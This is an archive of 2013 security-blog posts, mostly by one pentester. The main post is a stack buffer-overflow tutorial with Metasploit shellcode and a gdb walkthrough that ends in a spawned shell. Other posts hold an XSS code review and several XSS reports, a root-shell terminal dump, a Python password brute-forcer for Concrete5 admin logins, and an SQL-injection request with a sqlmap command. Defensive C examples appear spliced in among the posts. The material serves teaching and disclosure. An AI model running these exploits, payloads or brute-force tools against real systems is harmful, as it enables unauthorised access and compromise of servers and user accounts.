Tuesday 10 December 2013

[EN] Buffer overflows - my short review

This document was created to consolidate knowledge about buffer overflows.

1. Why does the exploit not work on modern systems?

Because new programs, systems and protections are being developed, and
attackers in turn work on new techniques to bypass those protections.

2. How do we check what security settings we have on our system?

On a machine like mine (Debian 7, where `uname -a` gives:
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux)

we can do it in a few ways, for example:

a) ldd - print shared library dependencies

Typing:
$ ldd <ourprog>
a few times, we can check whether the addresses in memory change between
runs. That tells us whether our system has so-called ASLR(1) enabled.

b) we can also check whether ASLR is enabled by default by reading the value
of the 'randomize_va_space' file:

$ cat /proc/sys/kernel/randomize_va_space

Any value other than 0 tells us that addresses will change.

For learning purposes it's useful to change this (default) value
to zero. We can do that with:
# echo "0" > /proc/sys/kernel/randomize_va_space

c) Tobias Klein(2) wrote a nice tool to check what security settings
were added to our binary. You can find this tool on his page(2).
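
The two checks from a) and b) can be automated. The program below is an added example, not code from the original post: it compares two captured `ldd` outputs line by line and counts the libraries whose load address moved, and it interprets the number read from /proc/sys/kernel/randomize_va_space. The two ldd outputs are constructed samples (an i386 layout like the Debian box above with ASLR on), not real captures.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Extract the "(0x...)" load address at the end of one ldd output line.
 * Returns 0 and stores the address, or -1 if the line carries none. */
static int ldd_line_addr(const char *line, unsigned long *addr)
{
    const char *p = strrchr(line, '(');
    if (p == NULL || strncmp(p, "(0x", 3) != 0)
        return -1;
    *addr = strtoul(p + 1, NULL, 16);
    return 0;
}

/* Compare two captured `ldd <prog>` outputs line by line.
 * Returns how many libraries were loaded at a different address in the
 * second run (0 = nothing moved, i.e. ASLR is probably off), or -1 if
 * the two outputs do not list the same libraries. */
int ldd_addresses_changed(const char *run1, const char *run2)
{
    int changed = 0;
    const char *p = run1, *q = run2;

    while (*p != '\0' && *q != '\0') {
        const char *pe = strchr(p, '\n'), *qe = strchr(q, '\n');
        char la[512], lb[512];
        unsigned long x = 0, y = 0;
        size_t na, nb;
        int ra, rb;

        if (pe == NULL) pe = p + strlen(p);
        if (qe == NULL) qe = q + strlen(q);
        na = (size_t)(pe - p);
        nb = (size_t)(qe - q);
        if (na >= sizeof la || nb >= sizeof lb)
            return -1;
        memcpy(la, p, na); la[na] = '\0';
        memcpy(lb, q, nb); lb[nb] = '\0';

        ra = ldd_line_addr(la, &x);
        rb = ldd_line_addr(lb, &y);
        if (ra != rb)
            return -1;              /* one run has an address, the other not */
        if (ra == 0 && x != y)
            changed++;

        p = (*pe == '\n') ? pe + 1 : pe;
        q = (*qe == '\n') ? qe + 1 : qe;
    }
    return (*p == '\0' && *q == '\0') ? changed : -1;
}

/* Interpret the text read from /proc/sys/kernel/randomize_va_space:
 * 0 = no randomisation, 1 = randomise stack, mmap base (hence shared
 * libraries) and VDSO, 2 = additionally randomise the heap (brk).
 * Returns -1 for anything that is not one of those values. */
int aslr_mode(const char *contents)
{
    char *end;
    long v = strtol(contents, &end, 10);
    if (end == contents || (*end != '\0' && *end != '\n') || v < 0 || v > 2)
        return -1;
    return (int)v;
}

/* Read the live setting; -1 when the file is absent (non-Linux host). */
int aslr_mode_from_proc(void)
{
    char buf[16];
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL)
        return -1;
    if (fgets(buf, sizeof buf, f) == NULL) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return aslr_mode(buf);
}

/* Constructed sample of two ldd runs with ASLR on: the library paths
 * match, only the load addresses differ (not a real capture). */
const char ldd_run_a[] =
    "\tlinux-gate.so.1 =>  (0xb7781000)\n"
    "\tlibc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb75fd000)\n"
    "\t/lib/ld-linux.so.2 (0xb7782000)\n";
const char ldd_run_b[] =
    "\tlinux-gate.so.1 =>  (0xb77c2000)\n"
    "\tlibc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb763e000)\n"
    "\t/lib/ld-linux.so.2 (0xb77c3000)\n";

int main(void)
{
    printf("libraries that moved between the sample runs: %d\n",
           ldd_addresses_changed(ldd_run_a, ldd_run_b));
    printf("randomize_va_space on this host: %d\n", aslr_mode_from_proc());
    return 0;
}
```

On a real box you would capture `ldd ./vulnerable` twice into two strings and pass them in; a count of 0 with a randomize_va_space value of 0 is the state the rest of this post assumes.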

3. Where can we start?

We can start anywhere we find a computer. ;)

A better question is: what should we know in order to start understanding,
not only retyping examples from books and articles?

So, a short list:
-- programming in C (you don't need to be an 'ace'; you only need a few
chapters from any book about C, where you will find information about
arrays, pointers, receiving and displaying characters, and probably a few
things about memory management).

-- programming in Python - because many tools (for example fuzzers) can
be created really fast.(3)

-- ASM - the magic and the scare, super difficult and super easy at the
same time. In my case the best way to learn this was paper and pen (4),
writing down the names of the registers (for example Intel's), what they mean and
what we can use them for. A nice way to memorize them.

The next step is getting used to all the super-magic mnemonics like add, movl, call
and so on. (You can write them down too. The more you practice, the better.)

-- if it's still not enough for you, a good start would also be:
$ man gcc
(try here (5)) and check what (changes and) options are available during
compilation (which will be useful to understand what protections
you can disable at the compilation stage).

4. Example

We will need some example vulnerable to attack.

On my blog I decided to write about a few cases of how to exploit RCE
in webapps (6), so in a similar way we will try to find a vulnerable
example in the C language.

https://github.com/search?q=extension%3AC+strcpy%28argv[1]%29&ref=cmdform

Searching in this way we will find a few examples of 'lessons' described
by someone else. We will use these examples. The first answer for our search
query is a program called 'vulnerable.c':

---<code>---
#include <string.h>

int main(int argc, char *argv[])
{
  char buffer[512];

  /* no length check: an argument longer than 512 bytes overflows the stack */
  if (argc > 1)
    strcpy(buffer,argv[1]);
  return 0;
}
---<code>---

Making sure that the "randomize_va_space" file has the value '0', we compile(7)
our vulnerable program with the following options:

* -ggdb - "Produce debugging information for use by GDB"
* -g     - "Produce debugging information in the operating system's native format"
* -fno-stack-protector - disables the protection

k@debian:~/src/bugz$ gcc vulnerable.c -o vulnerable -ggdb -g -fno-stack-protector
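
For contrast, here is the same program with the copy bounded by the destination size. This is an added example, not the code from the search result or from this post: `bounded_copy`, `max_accepted_len` and the two check functions are names chosen here, and the only assumption is the same 512-byte buffer as in vulnerable.c. The 528-byte input (524 'A' plus 4 'B') is the overflow length used later in this post.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same buffer size as vulnerable.c */

/* Copy src into dst only if it fits, terminating NUL included.
 * Returns 0 on success; returns -1 and leaves dst untouched when src is
 * too long, instead of writing past the end of the buffer. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    /* look for the NUL within dst_size bytes only, never scanning past */
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)
        return -1;                          /* src needs >= dst_size bytes */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Longest argument bounded_copy() accepts for a BUF_SIZE buffer. */
size_t max_accepted_len(void)
{
    return BUF_SIZE - 1;
}

/* Feed the 528-byte input the post uses (524 'A' + 4 'B') to the
 * bounded copy; returns 1 if it was refused, 0 if it was copied. */
int overlong_input_refused(void)
{
    char buffer[BUF_SIZE];
    char input[529];
    memset(input, 'A', 524);
    memset(input + 524, 'B', 4);
    input[528] = '\0';
    return bounded_copy(buffer, sizeof buffer, input) == -1;
}

/* A normal argument still works; returns 1 if the copy is intact. */
int short_input_copied(void)
{
    char buffer[BUF_SIZE];
    if (bounded_copy(buffer, sizeof buffer, "hello") != 0)
        return 0;
    return strcmp(buffer, "hello") == 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc > 1) {
        if (bounded_copy(buffer, sizeof buffer, argv[1]) != 0) {
            fprintf(stderr, "argument too long (max %zu bytes)\n",
                    max_accepted_len());
            return 1;
        }
        printf("copied %zu bytes\n", strlen(buffer));
    }
    return 0;
}
```

With this version the 528-byte argument is rejected before anything is written, so the saved return address is never reached. Compiling without -fno-stack-protector is a second, independent layer: the canary that -fstack-protector inserts would abort the process on the overwrite even if the copy were still unbounded.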

We will fill the buffer of our program with more data than it holds, to overflow it.

$ gdb -q ./vulnerable
(gdb) r `perl -e 'print "A"x524,"B"x4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "A"x524,"B"x4'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

Ok. The program crashed.

Now we will get a shellcode (from Metasploit on BackTrack 5(8)).
To get one, we will use 'msfpayload':

root@bt:/pentest/exploits/framework3# msfpayload linux/x86/exec CMD=dash R |
msfencode -a x86 -e x86/alpha_mixed -b "\x00\x0a\x0d" -t c
[*] x86/alpha_mixed succeeded with size 142 (iteration=1)

unsigned char buf[] =
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56"
"\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68"
"\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b"
"\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34"
"\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58"
"\x61\x58\x4d\x4f\x70\x41\x41";

With this command we have a shellcode ready to use as part of our buffer value.
To get this working we must remember to subtract the length of our
shellcode (142 bytes in this case) from our 'overflow' value (524*"A").

To exploit this vulnerability we need the following layout:
    [    A*382      ] + [ shellcode ]  + [ B*4 ]

so that EIP (the instruction pointer, which holds the address of the
next instruction to execute) is set to our "BBBB" string.

So now in 'gdb' we will use this string:

(gdb) r `perl -e 'print "A"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a
\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42
\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39
\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51
\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53
\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50
\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41","B"x4'`

Our output should look like this:
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp esp
eip            0x42424242       0x42424242
ebp            0x4141704f       0x4141704f
esp            0xbffff540       0xbffff540

Ok. Now we must locate the beginning of our shellcode in memory:

(gdb) x/600wx $esp
(...)

0xbffff880:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff890:     0x41414141      0x41414141      0x41414141      0xc6d9e189
0xbffff8a0:     0x58f471d9      0x49495950      0x49494949      0x49494949
0xbffff8b0:     0x43434343      0x51374343      0x58416a5a      0x30413050
(...)

Ok. Let's check whether the address gdb shows is really the one we want
to return to via our overflow:

(gdb) x/s 0xbffff890
0xbffff890:      'A' <repeats 12 times>"\211, \341\331\306\331q\
364XPYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICZVkV8Z9
CbE6CXVMRCLIZGCXToQcPhEPRHVOPbE9PnMYKSCbIxC5C0GpGpE4QqPsPhGpCgV3
LIXaXMOpAABBBB"

Almost good.

Instead of the letter "A" we will use the NOP ("no operation") instruction,
\x90. It lets us 'slide' down to our shellcode. Instead of the
"B" value, let's use the address we found before (0xbffff890, written
as little-endian bytes):

(gdb) r `perl -e 'print "\x90"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50
\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37
\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32
\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56
\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a
\x47\x43\x58\x54\x6f\x51\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45
\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47
\x70\x45\x34\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58
\x61\x58\x4d\x4f\x70\x41\x41","\x90\xf8\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "\x90"x382,
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49
\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30
\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50
\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36
\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68
\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62
\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50\x68
\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41",
"\x90\xf8\xff\xbf"'`
process 4336 is executing new program: /bin/dash
$ uname -a
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux
$

And that's all. Now we have exploited a buffer overflow vulnerability.

Thanks!



1) ASLR
    http://en.wikipedia.org/wiki/Address_space_layout_randomization
2) Tobias Klein
    http://www.trapkit.de
3) Python
    https://wiki.python.org/moin/BeginnersGuide
    http://en.wikibooks.org/wiki/Python_Programming
4) ASM
    http://en.wikibooks.org/wiki/X86_Assembly
5) GCC
    http://gcc.gnu.org/releases.html
6) Finding vulnerabilities at github.com
    http://hauntit.blogspot.com/2013/06/en-rce-another-lesson.html
7) GCC Debugging options
    http://gcc.gnu.org/onlinedocs/gcc-4.1.2/gcc/Debugging-Options.html
8) Metasploit
    http://www.metasploit.com
   
   

Tuesday 19 November 2013

[EN] Microsoft's bug bounty - updated

Yesterday was a day full of surprises.

Another nice email, this time from MS ;)




* Update @ 05.12.2013 *
http://technet.microsoft.com/en-us/security/cc308589.aspx

Thanks! ;)


Remember about responsible disclosure!

Cheers,
o/

[EN] LinkedIn Bug Bounty

It was a real pleasure to work with LinkedIn Security Team!

LinkedIn bugbounty


Thanks guys. ;)

Tuesday 29 October 2013

[EN] JSP Code Review - part 1

During pentesting of webapps in various companies, it often happens that
a few pages are written in JSP.

I have described here a few different cases of testing webapps - by white-box and/or
black-box testing - so today I decided: why not do it again for JSP-based pages? ;)

For our purpose, we can find a great example on one of the tutorial pages,
in the section called 'HTTP Header Request Example'. Below I will show you
how we can check whether this or that (or part of ;)) page is vulnerable to attacks.

(In case you don't know how to prepare your virtual environment for testing
JSP-based pages, check this site. There you will find a nearly step-by-step guide
to installing Tomcat with Java on your Linux box. If you have any trouble,
leave me an email or a comment below.)

Ok. Let's get back to our JSP tutorial.
The example code will show the headers of the request to our 'test page'.

---<code>---
<%@ page import="java.io.*,java.util.*" %>
<html>
<head>
<title>HTTP Header Request Example</title>
</head>
<body>
<center>
<h2>HTTP Header Request Example</h2>
<table width="100%" border="1" align="center">
<tr bgcolor="#949494">
<th>Header Name</th><th>Header Value(s)</th>
</tr>
<%
   Enumeration headerNames = request.getHeaderNames();
   while(headerNames.hasMoreElements()) {
      String paramName = (String)headerNames.nextElement();
      out.print("<tr><td>" + paramName + "</td>\n");
      String paramValue = request.getHeader(paramName);
      out.println("<td> " + paramValue + "</td></tr>\n");
   }
%>
</table>
</center>
</body>
</html>

---<code>---

Ok. Let's save this code as 'headers.jsp'.


It's not a problem to test this site using Burp, as described
in a few mini-articles here, but in this case we will do a little 'code review'. ;)


A few short examples were also described here or here. So here we will use
a similar trick. We know that if user input is not sanitized (or not sanitized properly),
then it's possible to inject code into the web page.


So now we will search for 'something' that prints out 'text' (a string) supplied
by the user. In our JSP, that will be the function out.print. Let's find out whether we can
grab this string in our source code:

# cat -n header.jsp | grep out.print
    17        out.print("<tr><td>" + paramName + "</td>\n");
    19        out.println("<td> " + paramValue + "</td></tr>\n");
#



Yes, we can. ;)


We can see 2 lines, both with 'some parameter/value names'.
Let's find out what those are:


(...)
      String paramName = (String)headerNames.nextElement();
(...)



It seems to be some 'string'; let's check the other 'parameter':


# grep paramValue header.jsp
      String paramValue = request.getHeader(paramName);
      out.println("<td> " + paramValue + "</td></tr>\n");
#



Great. So now we can see that 'paramName' comes from the request, and that
'paramValue' holds the value of that header (the getHeader() function). And, because it's not
filtered in any way before being printed out, we can try to inject some code here.


Let's check whether we can change one of the presented headers; for example,
let's change the User-Agent.


To do that we can use Tamper Data or the mentioned Burp Proxy (but honestly,
in my opinion, for this kind of 'simple check' Tamper Data will be fine).


Let's catch the request to the server (our 'header page' in JSP) and then
change the User-Agent value to our favourite 'XSS payload':

Tampered header
In response to this unfiltered input, we can see the nice old XSS alert box ;)
 

XSS in JSP webapp

Good luck with code review!

If you have any questions - as always - leave me an email. ;)

Cheers 
o/ 

Wednesday 9 October 2013

[EN] Testing format strings bugs

A few weeks ago I wrote a short post about where you can find examples
to learn about RCE vulnerabilities and how to exploit them.

Today I would like to present a similar story, this time for format string attacks.
You will find a few examples of vulnerable code here. ;)

If you have any questions feel free to ask, but once again:
I will help you only with legal ideas, so please do not send me emails
saying that you want to steal someone's database ;) Thanks.

Enjoy!

o/

[EN] Wordpress 3.6.1 XSS

"Houston we've got a problem..." ;)

... in the latest (3.6.1) Wordpress:


Same story as before, but it seems not to be patched anyway:
Enjoy, because 'it cannot be used' - right? ;)


* Update @ 17/10/2013 *

Check the file 'options-discussion.php' in the /wp-admin/ directory, lines 187-202.
There you will find:
---<code>---
   187  <?php
   188  $ratings = array(
   189          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   190          'G' => __('G &#8212; Suitable for all audiences'),
   191          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   192          'PG' => __('PG &#8212; Possibly offensive, usually for audiences 13 and above'),
   193          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   194          'R' => __('R &#8212; Intended for adult audiences above 17'),
   195          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   196          'X' => __('X &#8212; Even more mature than above')
   197  );
   198  foreach ($ratings as $key => $rating) :
   199          $selected = (get_option('avatar_rating') == $key) ? 'checked="checked"' : '';
   200          echo "\n\t<label><input type='radio' name='avatar_rating' value='" . esc_attr($key) . "' $selected/> $rating</label><br />";
   201  endforeach;
   202  ?>


---<code>---

so, because there is no check whether the 'rating' is valid or not, we can put
any JavaScript/HTML code we want into the 'avatar_rating' parameter. In this case a reflected XSS is possible.

To patch this bug, we need to edit the wp-includes/pluggable.php file and change line 1662 as below:
Changed pluggable.php file

Simply change this line and add Wordpress's function 'esc_html'.
Now it should be ok. ;)
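
The fix here and in the JSP code review above is the same one: encode the value for the context it is written into, just before output. WordPress has esc_html/esc_attr for that and JSP has JSTL's <c:out>, which escapes XML characters by default; the C program below is an added example, not code from either project, showing what such an encoder does and how the headers.jsp table row looks once name and value are escaped. The function names and the sample User-Agent value are chosen here for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Write the HTML-escaped form of `in` into `out` (capacity out_size).
 * The five characters that can break out of HTML text or a quoted
 * attribute are replaced by entities. Returns the escaped length, or -1
 * (with out emptied) when the result would not fit, so a caller can never
 * print a half-escaped string. */
long html_escape(const char *in, char *out, size_t out_size)
{
    size_t pos = 0;
    if (out_size == 0)
        return -1;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        size_t len;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        len = strlen(rep);
        if (pos + len >= out_size) {
            out[0] = '\0';
            return -1;
        }
        memcpy(out + pos, rep, len);
        pos += len;
    }
    out[pos] = '\0';
    return (long)pos;
}

/* Render one table row the way headers.jsp does, but with both the header
 * name and its value escaped first. Returns the row length or -1 if
 * anything did not fit. */
long render_header_row(const char *name, const char *value,
                       char *out, size_t out_size)
{
    char en[256], ev[1024];
    int n;
    if (html_escape(name, en, sizeof en) < 0 || html_escape(value, ev, sizeof ev) < 0)
        return -1;
    n = snprintf(out, out_size, "<tr><td>%s</td><td>%s</td></tr>", en, ev);
    if (n < 0 || (size_t)n >= out_size)
        return -1;
    return n;
}

/* Check helpers: escape (or render) and compare with the expected text. */
int escape_matches(const char *in, const char *expected)
{
    char buf[1024];
    return html_escape(in, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}

int row_matches(const char *name, const char *value, const char *expected)
{
    char row[2048];
    return render_header_row(name, value, row, sizeof row) >= 0
        && strcmp(row, expected) == 0;
}

/* A destination that is too small must be refused, not half-filled. */
int escape_rejected_when_too_small(void)
{
    char tiny[4];                        /* "&lt;" needs 4 bytes plus NUL */
    return html_escape("<", tiny, sizeof tiny) == -1 && tiny[0] == '\0';
}

/* Constructed sample: a tampered User-Agent like the one in the post. */
const char sample_user_agent[] = "<script>alert(1)</script>";

int main(void)
{
    char row[2048];
    if (render_header_row("User-Agent", sample_user_agent, row, sizeof row) >= 0)
        puts(row);   /* the browser now shows the payload as text instead of running it */
    return 0;
}
```

The point of the -1 path is worth keeping in any port of this: an encoder that truncates silently can hand back an unterminated entity or a dangling quote, which is exactly the kind of partial output that reintroduces the injection.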

Friday 4 October 2013

[EN] osCommerce 2.3.3.4 Exploited

Hi ;)

During a few projects I sometimes find that customers are using osCommerce
on their servers.

I prepared a small (PoC) tool to automate a little the process of password cracking
and exploiting the RCE available in the admin panel (again ;) ).

As I said, until next week this won't be public, sorry.
Anyway, if you think you will need it before then (to test your sites or
your customers'), feel free to let me know privately, via email as always.

Have a nice day
o/

Monday 30 September 2013

[EN] XSS at Microsoft page

Hi,

during bug bounty tests I decided to try Microsoft's page.

After a while, I found one bug.
Of course there was nice contact about the whole case, but
after asking about any response - no contact to this day. :)

So... public ;)





Similar story to the one described a few minutes ago about linkedin.com.

* Update @ 11/10.2013 *
Finally I've got an answer about this case, and it should be presented on their page.
In case of any news I will publish the details here.


Enjoy and remember to do only legal things ;)

Cheers
o/

[EN] Another XSS at LinkedIn.com

Hi,

during a few tests in a few different bug bounty programs,
on 19.09 this year I found another persistent XSS in our nice job portal
www.linkedin.com

From my mails with IT support I think it is patched now, but
if you want to try - here is a short list of steps to reproduce:

1. Log in to your account
2. Go to contact lists, to 'imported contacts'
3. Edit one contact
4. In the new window, in the edited person, the surname field is vulnerable
to persistent XSS.

Below, a screenshot from a sample 'attack':




* Update @ 01.10.2013 * 
'Seems to be patched in production.' ;)


* Update @ 04.10.2013 * 

The LinkedIn Team once again surprised me with their answer. :)
This is a really good team!
Good job guys!

Enjoy and remember, do only legal things ;)

Cheers
o/

Wednesday 25 September 2013

[EN] IPBoard 3.x Updates

Yesterday I saw a new post on the IPBoard Community Forum about a few
new vulnerabilities and patches.

If you're using the mentioned version(s), I would recommend updating as soon as you can.
"How to do it" was described on the forum page.

Big thanks to the guys from IPB Support for the fast response and great job!
Keep going! ;)

Friday 16 August 2013

[EN] Friday... ;)


root@bt:~/src/ntop/ntop-1.1$ ./entop
SIOCGIFADDR error: 1Û¸·ªªª%·UUUSSÍ1Û¸ªªª%UUUSSÍë^1ÀFF
  V
° N
 ó
Í1ÛØ@ÍèÜÿÿÿ/bin/shàìÿ¿àìÿ¿/
errno=19
 ntop v.1.1 MT [i686-pc-linux-gnu] listening on ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P

 Host                     Act   -Rcvd-      Sent       TCP       UDP     ICMP sh-4.1# uid=0(root) gid=0(root) groups=0(root)
          sh-4.1#


(;

Monday 12 August 2013

[EN] Concrete5 6.1.2 Multiple Bugs

From SQL injection via multiple XSS to information gathering...
Enjoy:


Starting with the description of the bugs available to a logged-in admin user, I should mention
that there is no anti-bruteforce mechanism, so if the admin's password is 'simple',
we can crack it, as described below:

Searching admin's password in Concrete5 CMS

Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py


#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys

username = 'admin'
path = '/index.php/login/do_login/'

if len(sys.argv) != 2:
    sys.exit('usage: %s http://target' % sys.argv[0])

print '\n_________________________________________________'
print '>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n'
print 'If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n'

# one candidate password per line; readlines() keeps the newline, so strip it
with open('passwords.txt', 'r') as pwdfile:
    read_pass = [line.rstrip('\n') for line in pwdfile]

url = sys.argv[1] + path

for test_pass in read_pass:
    data = {
        'uName': username,
        'uPassword': test_pass,
        'rcID': '',
        'submit': 'Sign+In+%3E',
    }

    # first request only obtains a session cookie, the second one submits the form
    get_cookies = requests.post(url)
    conn = requests.post(url, data=data, cookies=get_cookies.cookies)

    print '[ > ] Status code for this request: ', conn.status_code

    lines = conn.content

    # the page shown after a successful login contains the word 'Currently'
    if 'Currently' in lines:
        print '[+] Logged in as: [', username, '] with password: [', test_pass, ']'



---< code >---

So if we have the admin password, we can start from...

 1. SQL injection 
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223

-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"

8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"

11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"

14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"

AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"

'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"

8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"

<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"


-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"

Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"

170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"

0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"

1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
 

Because the "_bf[BLOCK_" parameters are not properly filtered, we can use them to generate an SQL error, like this:


---< response >---

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">&lt; Back to Home</a></p>
</div>

---< response >---


To reproduce this vulnerability you can use the sqlmap tool:

root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
